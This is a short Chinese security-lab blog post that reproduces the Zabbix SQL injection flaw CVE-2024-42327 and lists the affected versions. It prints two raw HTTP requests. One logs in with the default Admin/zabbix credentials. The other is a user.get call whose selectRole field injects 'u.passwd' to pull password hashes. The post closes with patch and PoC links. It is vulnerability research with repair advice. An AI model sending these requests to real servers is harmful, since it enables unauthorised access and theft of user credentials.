【失败复现】Zabbix SQL注入漏洞(CVE-2024-42327)
【失败复现】Zabbix SQL注入漏洞(CVE-2024-42327)
弥天安全实验室 弥天安全实验室 2024-12-10 16:01
网安引领时代,弥天点亮未来
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍Zabbix是Zabbix公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix 6.0.0至6.0.31版本、6.4.0至6.4.16版本和7.0.0版本存在SQL注入漏洞,该漏洞源于CUser类的addRelatedObjects函数中存在SQL注入漏洞,允许攻击者操纵数据库查询。0x02影响版本
6.0.0 <= Zabbix <= 6.0.31
6.4.0 <= Zabbix <= 6.4.16
Zabbix 7.0.0
0x03漏洞环境
1.访问漏洞环境
2.对漏洞进行测试 POC 默认账户密码登陆POST /api_jsonrpc.php HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json-rpcContent-Length: 106Connection: closeReferer: http://IP/Upgrade-Insecure-Requests: 1Priority: u=0, i{“jsonrpc”: “2.0”, “method”: “user.login”, “params”: {“username”: “Admin”, “password”: “zabbix”}, “id”: 1} 测试,若成功登录后请用poc测试POST /api_jsonrpc.php HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json-rpcContent-Length: 167Connection: closeUpgrade-Insecure-Requests: 1Priority: u=0, i{“jsonrpc”: “2.0”, “method”: “user.get”, “params”: {“selectRole”: [“roleid, u.passwd”, “roleid”], “userids”: “1”}, “auth”: “6146ec7544c34e008486df010f1a2b6c”, “id”: 1}测试脚本0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://support.zabbix.com/browse/ZBX-25623https://asciinema.org/a/pTSjmgDdSRsre9KtWhaSP2EIkhttps://github.com/depers-rus/CVE-2024-42327起因是这样的你吩咐我照办弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润! 弥 天安全实验室